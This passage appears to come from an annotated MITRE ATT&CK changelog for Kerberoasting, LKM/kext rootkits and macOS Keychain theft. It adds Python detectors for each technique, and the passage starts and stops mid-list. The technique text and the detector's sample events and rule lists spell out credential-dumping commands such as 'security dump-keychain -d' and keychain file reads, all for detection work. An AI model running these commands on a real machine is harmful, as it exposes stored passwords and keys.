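    ev("2022-03-08T09:15:00", "jdoe@CORP.LOCAL", "krbtgt", "0x12"),
    # one principal pulls RC4 tickets for five service accounts inside six seconds
    ev("2022-03-08T10:00:00", "contractor@CORP.LOCAL", "svc_sql", "0x17", ip="::ffff:10.0.3.7"),
    ev("2022-03-08T10:00:02", "contractor@CORP.LOCAL", "svc_iis", "0x17", ip="::ffff:10.0.3.7"),
    ev("2022-03-08T10:00:03", "contractor@CORP.LOCAL", "svc_backup", "0x17", ip="::ffff:10.0.3.7"),
    ev("2022-03-08T10:00:05", "contractor@CORP.LOCAL", "svc_sharepoint", "0x17", ip="::ffff:10.0.3.7"),
    ev("2022-03-08T10:00:06", "contractor@CORP.LOCAL", "svc_sccm", "0x17", ip="::ffff:10.0.3.7"),
    # a failed request (0x7, KDC_ERR_S_PRINCIPAL_UNKNOWN) issues no ticket to crack
    ev("2022-03-08T10:00:08", "contractor@CORP.LOCAL", "svc_nosuch", "0x17", ip="::ffff:10.0.3.7", status="0x7"),
    # a lone RC4 ticket to a legacy service: a hardening item, not an alert
    ev("2022-03-08T11:30:00", "asmith@CORP.LOCAL", "svc_legacy", "0x17"),
]


def is_roastable(record):
    """True for a successful RC4 service ticket to a user-style service account.

    Machine accounts (names ending in '$') and krbtgt are excluded: their keys
    derive from long random passwords, so an RC4 ticket to them is not
    practically crackable.
    """
    svc = record["ServiceName"]
    return (record["TicketEncryptionType"].lower() == RC4_HMAC
            and record["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoast_bursts(records, min_distinct_services=3, window=timedelta(minutes=5)):
    """Map requester -> sorted distinct services, for requesters that obtained RC4
    tickets to at least `min_distinct_services` services within `window`."""
    per_user = defaultdict(list)
    for r in records:
        if is_roastable(r):
            per_user[r["TargetUserName"]].append((datetime.fromisoformat(r["time"]), r["ServiceName"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()  # sliding window over time-ordered (timestamp, service) pairs
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= min_distinct_services:
                hits[user] = sorted(in_window)
                break
    return hits


def rc4_service_accounts(records):
    """Every service account issued an RC4 ticket: the list to move to AES-only
    (msDS-SupportedEncryptionTypes) and to long random passwords or gMSAs."""
    return sorted({r["ServiceName"] for r in records if is_roastable(r)})


if __name__ == "__main__":
    for user, services in detect_kerberoast_bursts(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
    print("RC4 service accounts seen:", ", ".join(rc4_service_accounts(SAMPLE_4769)))
```

Running the block prints the findings for the constructed sample; against real data, feed it the 4769 events exported from the domain controllers and tune `min_distinct_services` and `window` to the environment. AES tickets (etype 0x11/0x12) are left out because the brute-force path the description relies on is the RC4 ticket; they can still be cracked, only far more slowly, so the RC4 list is the first hardening target rather than the only one.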
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-20 19:30:10.687000+00:00 | 2022-03-08 21:52:42.405000+00:00 |
| description | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) | Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS) Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap) |
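The description above names "hiding itself" as the first feature of an LKM rootkit, and on the macOS side explains that with SIP enabled an unapproved kext signature never reaches the AuxKC. As an added example that is not part of the ATT&CK entry, the following Python shows two Linux host checks a responder runs for the LKM case: a diff of /sys/module against /proc/modules (the list lsmod reads, and the one a self-hiding module unlinks itself from), and a decode of the kernel taint bitmask, which records that an out-of-tree or unsigned module was ever loaded. The /proc/modules text, the sysfs listing and the module name hidden_mod are constructed; the taint bit positions are the ones documented in the kernel's Documentation/admin-guide/tainted-kernels.rst.

```python
"""Two host checks for hidden Loadable Kernel Modules.

Added example; it is not part of the ATT&CK entry. The /proc/modules text, the
/sys/module listing and the module name "hidden_mod" are constructed.

Check 1: a rootkit that hides by unlinking itself from the kernel's module list
(what lsmod and /proc/modules read) often leaves its /sys/module/<name> directory
behind. Loadable modules carry an `initstate` file there; built-in code that only
exposes parameters (e.g. /sys/module/printk) does not, which keeps it out of the diff.
Check 2: /proc/sys/kernel/tainted is a bitmask recording that an out-of-tree (O)
or unsigned (E) module was loaded at some point, even after it unloads or hides.
"""
import os

PROC_MODULES = """\
xt_conntrack 16384 2 - Live 0x0000000000000000
nf_conntrack 172032 1 xt_conntrack, Live 0x0000000000000000
ext4 782336 1 - Live 0x0000000000000000
"""

# name -> entries found in /sys/module/<name>/ (constructed)
SYS_MODULE = {
    "xt_conntrack": {"initstate", "refcnt", "sections", "holders"},
    "nf_conntrack": {"initstate", "refcnt", "sections", "holders", "parameters"},
    "ext4": {"initstate", "refcnt", "sections", "holders"},
    "hidden_mod": {"initstate", "refcnt", "sections"},  # loaded, but no /proc/modules line
    "printk": {"parameters"},                            # built-in: no initstate, legitimately absent
    "kernel": {"parameters"},
}

# Module-related bits of /proc/sys/kernel/tainted (Documentation/admin-guide/tainted-kernels.rst)
TAINT_BITS = {
    0: "P: proprietary module loaded",
    1: "F: module force-loaded",
    3: "R: module force-unloaded",
    10: "C: staging driver loaded",
    12: "O: out-of-tree module loaded",
    13: "E: unsigned module loaded",
    15: "K: kernel live-patched",
}


def parse_proc_modules(text):
    """Parse /proc/modules lines: name size refcount deps state address."""
    modules = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        deps = [d for d in fields[3].rstrip(",").split(",") if d and d != "-"]
        modules[fields[0]] = {"size": int(fields[1]), "refcount": int(fields[2]),
                              "deps": deps, "state": fields[4]}
    return modules


def find_hidden_modules(proc_modules, sys_module):
    """Loadable modules (have initstate in sysfs) that are missing from /proc/modules."""
    return sorted(name for name, entries in sys_module.items()
                  if "initstate" in entries and name not in proc_modules)


def decode_taint(value):
    """Human-readable module-related taint flags set in the bitmask."""
    return [desc for bit, desc in sorted(TAINT_BITS.items()) if value & (1 << bit)]


def read_host():
    """Collect the same three inputs from a live Linux host."""
    with open("/proc/modules") as f:
        proc_text = f.read()
    sysfs = {name: set(os.listdir(os.path.join("/sys/module", name)))
             for name in os.listdir("/sys/module")}
    with open("/proc/sys/kernel/tainted") as f:
        taint = int(f.read().strip())
    return proc_text, sysfs, taint


if __name__ == "__main__":
    hidden = find_hidden_modules(parse_proc_modules(PROC_MODULES), SYS_MODULE)
    print("in /sys/module but not in /proc/modules:", hidden or "none")
    print("taint flags for value 12288:", decode_taint(12288))
```

`read_host()` gathers the real inputs on a live system. The sysfs diff only catches a module that unlinked itself from the module list and left its kobject in place; a rootkit that also removes its sysfs directory has to be found through the taint flags, /proc/kallsyms, or memory forensics (the Volatility citation in the entry). On macOS 11 and later, `kmutil showloaded` lists the kexts actually present in the kernel collections.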
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 04:03:46.357000+00:00 | 2022-04-20 18:53:39.406000+00:00 |
| description | Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) | Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview) Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS) Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap) |
| external_references[1]['source_name'] | Linux Kernel Programming | Apple Developer Configuration Profile |
| external_references[1]['description'] | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. | Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021. |
| external_references[1]['url'] | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf | https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf |
| external_references[2]['source_name'] | Linux Kernel Module Programming Guide | Apple Kernel Extension Deprecation |
| external_references[2]['description'] | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018. | Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020. |
| external_references[2]['url'] | http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html | https://developer.apple.com/support/kernel-extensions/ |
| external_references[3]['source_name'] | iDefense Rootkit Overview | System and kernel extensions in macOS |
| external_references[3]['description'] | Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018. | Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022. |
| external_references[3]['url'] | http://www.megasecurity.org/papers/Rootkits.pdf | https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web |
| external_references[4]['source_name'] | Apple Kernel Extension Deprecation | GitHub Reptile |
| external_references[4]['description'] | Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020. | Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018. |
| external_references[4]['url'] | https://developer.apple.com/support/kernel-extensions/ | https://github.com/f0rb1dd3n/Reptile |
| external_references[6]['source_name'] | CrowdStrike Linux Rootkit | iDefense Rootkit Overview |
| external_references[6]['description'] | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. | Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018. |
| external_references[6]['url'] | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ | http://www.megasecurity.org/papers/Rootkits.pdf |
| external_references[7]['source_name'] | GitHub Reptile | Linux Loadable Kernel Module Insert and Remove LKMs |
| external_references[7]['description'] | Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018. | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018. |
| external_references[7]['url'] | https://github.com/f0rb1dd3n/Reptile | http://tldp.org/HOWTO/Module-HOWTO/x197.html |
| external_references[8]['source_name'] | GitHub Diamorphine | CrowdStrike Linux Rootkit |
| external_references[8]['description'] | Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. |
| external_references[8]['url'] | https://github.com/m0nad/Diamorphine | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ |
| external_references[9]['source_name'] | RSAC 2015 San Francisco Patrick Wardle | GitHub Diamorphine |
| external_references[9]['description'] | Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018. | Mello, V. (2018, March 8). Diamorphine - LKM rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. |
| external_references[9]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://github.com/m0nad/Diamorphine |
| external_references[10]['source_name'] | Synack Secure Kernel Extension Broken | Securelist Ventir |
| external_references[10]['description'] | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018. | Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018. |
| external_references[10]['url'] | https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ | https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ |
| external_references[11]['source_name'] | Securelist Ventir | User Approved Kernel Extension Pike’s |
| external_references[11]['description'] | Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018. | Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021. |
| external_references[11]['url'] | https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ | https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/ |
| external_references[12]['source_name'] | Trend Micro Skidmap | Linux Kernel Module Programming Guide |
| external_references[12]['description'] | Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020. | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018. |
| external_references[12]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ | http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html |
| external_references[13]['source_name'] | Linux Loadable Kernel Module Insert and Remove LKMs | Linux Kernel Programming |
| external_references[13]['description'] | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018. | Pomerantz, O., Salzman, P. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. |
| external_references[13]['url'] | http://tldp.org/HOWTO/Module-HOWTO/x197.html | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf |
| external_references[14]['source_name'] | Wikipedia Loadable Kernel Module | Trend Micro Skidmap |
| external_references[14]['description'] | Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018. | Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020. |
| external_references[14]['url'] | https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux | https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ |
| external_references[15]['source_name'] | User Approved Kernel Extension Pike’s | Purves Kextpocalypse 2 |
| external_references[15]['description'] | Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021. | Richard Purves. (2017, November 9). MDM and the Kextpocalypse. Retrieved September 23, 2021. |
| external_references[15]['url'] | https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/ | https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/ |
| external_references[16]['source_name'] | Purves Kextpocalypse 2 | RSAC 2015 San Francisco Patrick Wardle |
| external_references[16]['description'] | Richard Purves. (2017, November 9). MDM and the Kextpocalypse. Retrieved September 23, 2021. | Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018. |
| external_references[16]['url'] | https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/ | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf |
| external_references[17]['source_name'] | Apple Developer Configuration Profile | Synack Secure Kernel Extension Broken |
| external_references[17]['description'] | Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021. | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018. |
| external_references[17]['url'] | https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf | https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ |
| x_mitre_data_sources[3] | File: File Creation | Process: Process Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wikipedia Loadable Kernel Module', 'description': 'Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.', 'url': 'https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux'} | |
| x_mitre_contributors | Eric Kaiser @ideologysec | |
| x_mitre_data_sources | File: File Creation |
| Old Description | New Description |
|---|---|
| Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials. | Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann) Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain -d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) |
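The new description names two access paths a defender can watch for: `security dump-keychain -d` (and other `security` subcommands that print secret material) in process-creation or command-execution telemetry, and direct reads of `*.keychain`/`*.keychain-db` files by processes that have no reason to open them. The following is an added detection example, not code from ATT&CK or any cited tool; the event schema, the baseline of expected keychain readers, and the sample events are all constructed assumptions to be tuned per fleet.

```python
"""Flag Keychain credential-dumping activity in macOS telemetry.

Added example; the event schema and SAMPLE_EVENTS are constructed, not real
telemetry. Two rule families:
  1. `security` invocations whose subcommand/flags print secrets
     (e.g. `security dump-keychain -d`);
  2. reads of keychain files by processes outside an assumed baseline.
"""
import posixpath

# Every location the technique names (~/Library/Keychains/, /Library/Keychains/,
# /Network/Library/Keychains/) contains this marker.
KEYCHAIN_DIR_MARKER = "/Library/Keychains/"
KEYCHAIN_SUFFIXES = (".keychain", ".keychain-db")

# Assumed baseline of processes that legitimately open keychain files directly.
EXPECTED_KEYCHAIN_READERS = {
    "/usr/sbin/securityd",
    "/usr/libexec/secd",
    "/usr/bin/security",
    "/Applications/Utilities/Keychain Access.app/Contents/MacOS/Keychain Access",
}

# `security` subcommands and the flags that make them emit secret material.
SECRET_PRINTING = {
    "dump-keychain": {"-d"},                    # -d decrypts and prints item data
    "find-generic-password": {"-w", "-g"},      # -w/-g print the password
    "find-internet-password": {"-w", "-g"},
}


def _security_subcommand(argv):
    """Return (subcommand, remaining args) if argv runs `security`, else None.
    Scans argv so `sudo security ...` and full paths are both handled."""
    for i, arg in enumerate(argv):
        if posixpath.basename(arg) == "security" and i + 1 < len(argv):
            return argv[i + 1], argv[i + 2:]
    return None


def check_process(event):
    """Rules for a process-creation event: {'type': 'process', 'argv': [...]}."""
    hit = _security_subcommand(event["argv"])
    if hit is None:
        return []
    sub, rest = hit
    if sub == "export":
        return [{"rule": "security_export_keychain", "severity": "medium"}]
    if sub not in SECRET_PRINTING:
        return []
    tag = sub.replace("-", "_")
    if SECRET_PRINTING[sub] & set(rest):
        return [{"rule": f"security_{tag}_secret_output", "severity": "high"}]
    return [{"rule": f"security_{tag}_metadata", "severity": "low"}]


def check_file_access(event):
    """Rules for a file-access event: {'type': 'file_access', 'process': ..., 'path': ...}."""
    path = event["path"]
    if KEYCHAIN_DIR_MARKER not in path or not path.endswith(KEYCHAIN_SUFFIXES):
        return []
    if event["process"] in EXPECTED_KEYCHAIN_READERS:
        return []
    # The login keychain holds the user's own secrets, so rank it above others.
    sev = "high" if posixpath.basename(path).startswith("login.keychain") else "medium"
    return [{"rule": "keychain_file_read_by_unexpected_process", "severity": sev}]


def scan(events):
    """Run both rule families over a list of events; return findings with event index."""
    findings = []
    for idx, ev in enumerate(events):
        rules = check_process(ev) if ev["type"] == "process" else check_file_access(ev)
        findings.extend({"event": idx, **r} for r in rules)
    return findings


# Constructed sample telemetry (not from a real host).
SAMPLE_EVENTS = [
    {"type": "process", "argv": ["/usr/bin/security", "dump-keychain", "-d",
                                 "/Users/alice/Library/Keychains/login.keychain-db"]},
    {"type": "process", "argv": ["/usr/bin/security", "find-generic-password", "-s", "wifi", "-w"]},
    {"type": "process", "argv": ["/usr/bin/security", "list-keychains"]},        # benign
    {"type": "file_access", "process": "/usr/bin/python3",
     "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "file_access", "process": "/usr/libexec/secd",
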